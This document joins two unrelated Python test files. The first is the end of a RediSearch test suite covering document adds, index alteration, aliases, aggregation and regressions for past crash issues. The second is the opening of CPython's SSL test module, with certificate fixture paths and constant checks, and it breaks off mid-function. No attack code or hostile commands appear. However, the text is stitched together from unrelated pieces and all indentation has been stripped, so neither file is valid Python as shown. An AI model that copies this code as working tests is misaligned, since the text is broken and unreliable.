d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
# Tests issue #210
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc1', 1.0,
'fields', 'txt', 'goodbye world')
env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])
# Now with replace
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
'fields', 'txt', 'goodbye world')
env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
from multiprocessing import Process
import random
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
docs_per_thread = 100
num_threads = 50
docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]
def thrfn():
myIds = docIds[::]
random.shuffle(myIds)
cli = env.getConnection()
with cli.pipeline(transaction=False) as pl:
for x in myIds:
pl.execute_command('ft.add', 'idx', x, 1.0,
'fields', 'txt', ' hello world ' * 50)
try:
pl.execute()
except Exception as e:
pass
# print e
thrs = [Process(target=thrfn) for x in range(num_threads)]
[th.start() for th in thrs]
[th.join() for th in thrs]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
# Insert a document
env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
for _ in env.reloading_iterator():
exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
res = env.cmd('ft.search', 'idx', 'match')
env.assertEqual(exp, res)
def testNonDefaultDb(env):
if env.is_cluster():
raise unittest.SkipTest()
# Should be ok
env.cmd('FT.CREATE', 'idx1', 'schema', 'txt', 'text')
try:
env.cmd('SELECT 1')
except redis.ResponseError:
return
# Should fail
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx2', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
env.cmd('FT.CREATE', 'idx', 'schema', 'txt', 'text')
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'fields',
'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3')
res = env.cmd('ft.get', 'idx', 'doc')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertTrue(res['f1'] in ('f1val', 'f1val2'))
env.assertEqual('f1Val3', res['F1'])
def testDuplicateFields(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'txt',
'TEXT', 'num', 'NUMERIC', 'SORTABLE')
for _ in env.retry_with_reload():
# Ensure the index assignment is correct after an rdb load
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
'txt', 'foo', 'txt', 'bar', 'txt', 'baz')
# Try add hash
env.hmset('newDoc', {'txt': 'foo', 'Txt': 'bar', 'txT': 'baz'})
# Get the actual value:
from redis import ResponseError
if not env.is_cluster():
with env.assertResponseError(contained='twice'):
env.cmd('FT.ADDHASH', 'idx', 'newDoc', 1.0)
# Try with REPLACE
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE', 'FIELDS',
'txt', 'foo', 'txt', 'bar')
# With replace partial
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42)
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42, 'num', 32)
def testDuplicateSpec(env):
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1',
'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
# Note, the document needs to have one present sortable field in
# order for the indexer to give it a sort vector
env.cmd('ft.create', 'idx', 'SCHEMA', 'lastName', 'text',
'SORTABLE', 'firstName', 'text', 'SORTABLE')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
"firstName", "ASC", "limit", 0, 100)
# commented because we don't filter out exclusive sortby fields
# env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
if env.is_cluster():
raise unittest.SkipTest()
# Ensure we can work in Lua and Multi environments without crashing
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)
r = env.getConnection()
r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)
# Try in a pipeline:
with r.pipeline(transaction=True) as pl:
pl.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'f1', 'v3')
pl.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'f1', 'v4')
pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
pl.execute()
def testLanguageField(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'language', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
'FIELDS', 'language', 'gibberish')
res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
# The only way I can verify that LANGUAGE is parsed twice is ensuring we
# provide a wrong language. This is much easier to test than trying to
# figure out how a given word is stemmed
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
# This would previously crash
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
for x in range(2000):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(
x), 1.0, 'FIELDS', 'f1', 'HELLO')
env.broadcast('SAVE')
for x in range(10):
env.broadcast('DEBUG RELOAD')
def normalize_row(row):
return to_dict(row)
def assertAggrowsEqual(env, exp, got):
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
# and now, it's just free form:
exp = sorted(to_dict(x) for x in exp[1:])
got = sorted(to_dict(x) for x in got[1:])
env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
from pprint import pprint
# pprint(exp)
# pprint(got)
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
exp = list(grouper(exp[1:], 2))
got = list(grouper(got[1:], 2))
for x in range(len(exp)):
exp_did, exp_fields = exp[x]
got_did, got_fields = got[x]
env.assertEqual(exp_did, got_did, message="at position {}".format(x))
got_fields = to_dict(got_fields)
exp_fields = to_dict(exp_fields)
env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
def testAlterIndex(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx', 'world')
env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
for x in range(10):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))
for _ in env.retry_with_reload():
# Test that sortable works
res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'], 'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'], 'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', [
'f1', 'hello', 'f3', 'val4'], 'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'], 'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
assertResultsEqual(env, exp, res)
# Test that we can add a numeric field
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
for _ in env.retry_with_reload():
res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
env.assertEqual([1, 'docN1', ['n1', '50']], res)
def testAlterValidation(env):
# Test that constraints for ALTER comand
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'f0', 'TEXT')
for x in range(1, 32):
env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
# OK for now.
# Should be too many indexes
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')
env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'SCHEMA', 'f0', 'TEXT')
# print env.cmd('FT.INFO', 'idx2')
for x in range(1, 50):
env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')
env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)
env.cmd('FT.CREATE', 'idx3', 'SCHEMA', 'f0', 'text')
# Try to alter the index with garbage
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
ret = to_dict(env.cmd('ft.info', 'idx3'))
env.assertEqual(1, len(ret['fields']))
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_1(env):
if env.is_cluster():
raise unittest.SkipTest('ADDHASH unsupported!')
# Test random RDB regressions, see GH 366
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.hmset('foo', {'textfield': 'blah', 'numfield': 1})
env.cmd('FT.ADDHASH', 'idx1', 'foo', 1, 'replace')
env.cmd('FT.DEL', 'idx1', 'foo')
for _ in env.retry_with_reload():
pass # --just ensure it doesn't crash
def testIssue366_2(env):
# FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
# shutdown
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
env.cmd('ft.add', 'idx1', 'doc1', 1,
'PAYLOAD', '{"hello":"world2"}',
'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
for _ in env.retry_with_reload():
pass #
def testIssue654(env):
# Crashes during FILTER
env.cmd('ft.create', 'idx', 'schema', 'id', 'numeric')
env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
env.cmd('FT.CREATE', 'idx2', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
# Create a document and then replace it.
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's100', 'numfield', 990)
env.dump_and_reload()
# RDB Should still be fine
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's200', 'numfield', 1090)
doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
env.assertEqual('s200', doc['textfield'])
env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
command = ['ft.create', 'idx', 'schema']
for x in range(255):
command += ['t{}'.format(x), 'numeric', 'sortable']
command = command[:-1]
env.cmd(*command)
for _ in env.reloading_iterator():
try:
env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
except redis.ResponseError as e:
env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'WEIGHT', '5.0',
'body', 'TEXT',
'url', 'TEXT')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'bod', 'lorem ipsum', 'url', 'www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'no-as')
env.assertEqual([0], rv)
def testIssue446(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'SORTABLE')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([1], rv)
# Related - issue 635
env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([2], rv)
def testTimeoutSettings(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
def testAlias(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.create', 'idx2', 'schema', 't1', 'text')
env.cmd('ft.aliasAdd', 'myIndex', 'idx')
env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'idx', 'hello')
env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
r2 = env.cmd('ft.search', 'myIndex', 'hello')
env.assertEqual(r, r2)
# try to add the same alias again; should be an error
env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
# now delete the index
env.cmd('ft.drop', 'myIndex')
# index list should be cleared now. This can be tested by trying to alias
# the old alias to different index
env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
env.cmd('ft.aliasAdd', 'alias2', 'idx2')
env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'alias2', 'hello')
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# check that aliasing one alias to another returns an error. This will
# end up being confusing
env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()
# check that deleting the alias works as expected
env.expect('ft.aliasDel', 'myIndex').notRaiseError()
env.expect('ft.search', 'myIndex', 'foo').raiseError()
# create a new index and see if we can use the old name
env.cmd('ft.create', 'idx3', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
# also, check that this works in rdb save
for _ in env.retry_with_rdb_reload():
r = env.cmd('ft.search', 'myIndex', 'foo')
env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)
# Check that we can move an alias from one index to another
env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
r = env.cmd('ft.search', 'myIndex', "hello")
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# Test that things like ft.get, ft.aggregate, etc. work
r = env.cmd('ft.get', 'myIndex', 'doc2')
env.assertEqual(['t1', 'hello'], r)
r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
env.assertEqual([1, ['t1', 'hello']], r)
r = env.cmd('ft.del', 'myIndex', 'doc2')
env.assertEqual(1, r)
def testNoCreate(env):
env.cmd('ft.create', 'idx', 'schema', 'f1', 'text')
env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
# Standalone functionality
def testIssue484(env):
# Issue with split
# 127.0.0.1:6379> ft.drop productSearch1
# OK
# 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'schema', 'productid',
'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
'load', '2', '@color', '@categoryid',
'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
'GROUPBY', '1', '@value',
'REDUCE', 'COUNT', '0', 'as', 'value_count',
'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
assertAggrowsEqual(env, expected, res)
for var in expected:
env.assertIn(var, res)
def testIssue501(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
env.assertEqual([], rv[0][2])
def testIssue589(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
env.expect('ft.create', 'test', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
env.expect('ft.search', 'test', '@uuid:{foo}').equal([1L, 'a', ['uuid', 'foo', 'title', 'bar']])
# Server crash on doc names that conflict with index keys #666
def testIssue666(env):
env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')
# crashes here
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
# try with replace:
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testOptionalFilter(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
for x in range(100):
env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields', 't1', 'hello world word{}'.format(x))
print env.cmd('ft.explain', 'idx', '(~@t1:word20)')
# print(r)
r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
print(r)
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
from itertools import izip_longest
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
return {r[i]: r[i + 1] for i in range(0, len(r), 2)}
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_SSLv23
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_SSLv23')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
